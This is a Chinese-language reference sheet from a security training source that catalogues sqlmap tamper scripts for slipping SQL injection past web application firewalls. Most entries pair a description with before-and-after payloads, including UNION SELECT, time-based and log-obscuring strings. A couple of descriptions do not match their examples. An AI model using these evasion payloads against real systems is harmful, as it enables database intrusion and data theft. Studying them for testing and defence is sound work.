SQLmap绕过脚本 --tamper
来源:天融信教育
(1) apostrophemask.py UTF-8编码
Example:
* Input: AND '1'='1'
* Output: AND %EF%BC%871%EF%BC%87=%EF%BC%871%EF%BC%87
(2) apostrophenullencode.py unicode编码
Example:
* Input: AND '1'='1'
* Output: AND %00%271%00%27=%00%271%00%27
(3) appendnullbyte.py 添加%00
Example:
* Input: AND 1=1
* Output: AND 1=1%00
Requirement:
* Microsoft Access
(4) base64encode.py base64编码
Example:
* Input: 1' AND SLEEP(5)#
* Output: MScgQU5EIFNMRUVQKDUpIw==
(5) between.py 以“not between”替换“>”
Example:
* Input: 'A > B'
* Output: 'A NOT BETWEEN 0 AND B'
(6) bluecoat.py 以随机的空白字符替代空格,以“like”替代“= ”
Example:
* Input: SELECT id FROM users where id = 1
* Output: SELECT%09id FROM users where id LIKE 1
Requirement:
* MySQL 5.1, SGOS
(7) chardoubleencode.py 双重url编码
Example:
* Input: SELECT FIELD FROM%20TABLE
* Output: %2553%2545%254c%2545%2543%2554%2520%2546%2549%2545%254c%2544%2520%2546%2552%254f%254d%2520%2554%2541%2542%254c%2545
(8) charencode.py url编码
Example:
* Input: SELECT FIELD FROM%20TABLE
* Output: %53%45%4c%45%43%54%20%46%49%45%4c%44%20%46%52%4f%4d%20%54%41%42%4c%45
(9) charunicodeencode.py 对未进行url编码的字符进行unicode编码
Example:
* Input: SELECT FIELD%20FROM TABLE
* Output: %u0053%u0045%u004c%u0045%u0043%u0054%u0020%u0046%u0049%u0045%u004c%u0044%u0020%u0046%u0052%u004f%u004d
%u0020%u0054%u0041%u0042%u004c%u0045'
Requirement:
* ASP
* ASP.NET
(10) equaltolike.py 以“like”替代“=”
Example:
* Input: SELECT * FROM users WHERE id=1
* Output: SELECT * FROM users WHERE id LIKE 1
(11) halfversionedmorekeywords.py在每个关键字前添加条件注释
Example:
* Input: value' UNION ALL SELECT CONCAT(CHAR(58,107,112,113,58),IFNULL(CAST(CURRENT_USER() AS CHAR),CHAR(32)),CHAR(58,97,110,121,58)), NULL, NULL# AND
'QDWa'='QDWa
* Output: value'/*!0UNION/*!0ALL/*!0SELECT/*!0CONCAT(/*!0CHAR(58,107,112,113,58),/*!0IFNULL(CAST(/*!0CURRENT_USER()/*!0AS/*!0CHAR),/*!0CHAR(32)),/*!0CHAR
(58,97,110,121,58)), NULL, NULL#/*!0AND 'QDWa'='QDWa
Requirement:
* MySQL < 5.1
(12) ifnull2ifisnull.py 以“IF(ISNULL(A), B, A)”替换“IFNULL(A, B)”
Example:
* Input: IFNULL(1, 2)
* Output: IF(ISNULL(1), 2, 1)
Requirement:
* MySQL
* SQLite (possibly)
* SAP MaxDB (possibly)
(13) modsecurityversioned.py 条件注释
Example:
* Input: 1 AND 2>1--
* Output: 1 /*!30000AND 2>1*/--
Requirement:
* MySQL
(14) modsecurityzeroversioned.py 条件注释,0000
Example:
* Input: 1 AND 2>1--
* Output: 1 /*!00000AND 2>1*/--
Requirement:
* MySQL
(15) multiplespaces.py 添加多个空格
Example:
* Input: UNION SELECT
* Output: UNION SELECT
(16) nonrecursivereplacement.py 可以绕过对关键字删除的防注入(这个我也不知道怎么说好,看例子……)
Example:
* Input: 1 UNION SELECT 2--
* Output: 1 UNUNIONION SELSELECTECT 2--
(17) percentage.py 在每个字符前添加百分号(%)
Example:
* Input: SELECT FIELD FROM TABLE
* Output: %S%E%L%E%C%T %F%I%E%L%D %F%R%O%M %T%A%B%L%E
Requirement:
* ASP
(18) randomcase.py 随即大小写
Example:
* Input: INSERT
* Output: InsERt
(19) randomcomments.py 随机插入区块注释
Example:
'INSERT' becomes 'IN/**/S/**/ERT'
securesphere.py 语句结尾添加”真”字符串
Example:
* Input: AND 1=1
* Output: AND 1=1 and '0having'='0having'
(20) sp_password.py 语句结尾添加“sp_password”迷惑数据库日志(很……)
Example: www.2cto.com
* Input: 1 AND 9227=9227--
* Output: 1 AND 9227=9227--sp_password
Requirement:
* MSSQL
(21) space2comment.py 以区块注释替换空格
Example:
* Input: SELECT id FROM users
* Output: SELECT/**/id/**/FROM/**/users
(22) space2dash.py 以单行注释“--”和随机的新行替换空格
Example:
* Input: 1 AND 9227=9227
* Output: 1--PTTmJopxdWJ%0AAND--cWfcVRPV%0A9227=9227
Requirement:
* MSSQL
* SQLite
(23) space2hash.py 以单行注释“#”和由随机字符组成的新行替换空格
Example:
* Input: 1 AND 9227=9227
* Output: 1%23PTTmJopxdWJ%0AAND%23cWfcVRPV%0A9227=9227
Requirement:
* MySQL
(24) space2morehash.py 没看出来和上面那个有什么区别……
Requirement:
* MySQL >= 5.1.13
(25) space2mssqlblank.py 以随机空白字符替换空格
Example:
* Input: SELECT id FROM users
* Output: SELECT%08id%02FROM%0Fusers
Requirement:
* Microsoft SQL Server
(26) space2mssqlhash.py 以单行注释“#”和新行替换空格
Example:
* Input: 1 AND 9227=9227* Output: 1%23%0A9227=9227
Requirement:
* MSSQL
* MySQL
(27) space2mysqlblank.py 以随机空白字符替换空格
Example:
* Input: SELECT id FROM users* Output: SELECT%0Bid%0BFROM%A0users
Requirement:
* MySQL
(28) space2mysqldash.py 以单行注释和新行替换空格
Example:
* Input: 1 AND 9227=9227
* Output: 1--%0AAND--%0A9227=9227
Requirement:
* MySQL
* MSSQL
(29) space2plus.py 以“+”替换空格
Example:
* Input: SELECT id FROM users
* Output: SELECT+id+FROM+users
(30) space2randomblank.py 随机空白字符替换空格
Example:
* Input: SELECT id FROM users
* Output: SELECT\rid\tFROM\nusers
(31) unionalltounion.py 以“union all”替换“union ”
Example:
* Input: -1 UNION ALL SELECT
* Output: -1 UNION SELECT
(32) unmagicquotes.py 以“%bf%27”替换单引号,并在结尾添加注释“--”
Example:
* Input: 1' AND 1=1
* Output: 1%bf%27 AND 1=1--%20
(33)versionedkeywords.py 对不是函数的关键字条件注释
Example:
* Input: 1 UNION ALL SELECT NULL, NULL, CONCAT(CHAR(58,104,116,116,58),IFNULL(CAST(CURRENT_USER() AS CHAR),CHAR(32)),CHAR(58,100,114,117,58))#
* Output: 1/*!UNION*//*!ALL*//*!SELECT*//*!NULL*/,/*!NULL*/,CONCAT(CHAR(58,104,116,116,58),IFNULL(CAST(CURRENT_USER()/*!AS*//*!CHAR*/),CHAR(32)),CHAR(58,100,114,117,58))#
Requirement:
* MySQL
(34) versionedmorekeywords.py 对关键字条件注释
Example:
* Input: 1 UNION ALL SELECT NULL, NULL, CONCAT(CHAR(58,122,114,115,58),IFNULL(CAST(CURRENT_USER() AS CHAR),CHAR(32)),CHAR(58,115,114,121,58))#
* Output: 1/*!UNION*//*!ALL*//*!SELECT*//*!NULL*/,/*!NULL*/,/*!CONCAT*/(/*!CHAR*/(58,122,114,115,58),/*!IFNULL*/(CAST(/*!CURRENT_USER*/()/*!AS*//*!CHAR*/),/*!CHAR*/(32)),/*!CHAR*/(58,115,114,121,58))#
Requirement:
* MySQL >= 5.1.13
声明:该文章仅用于学术交流
感兴趣的小伙伴
扫描下方二维码
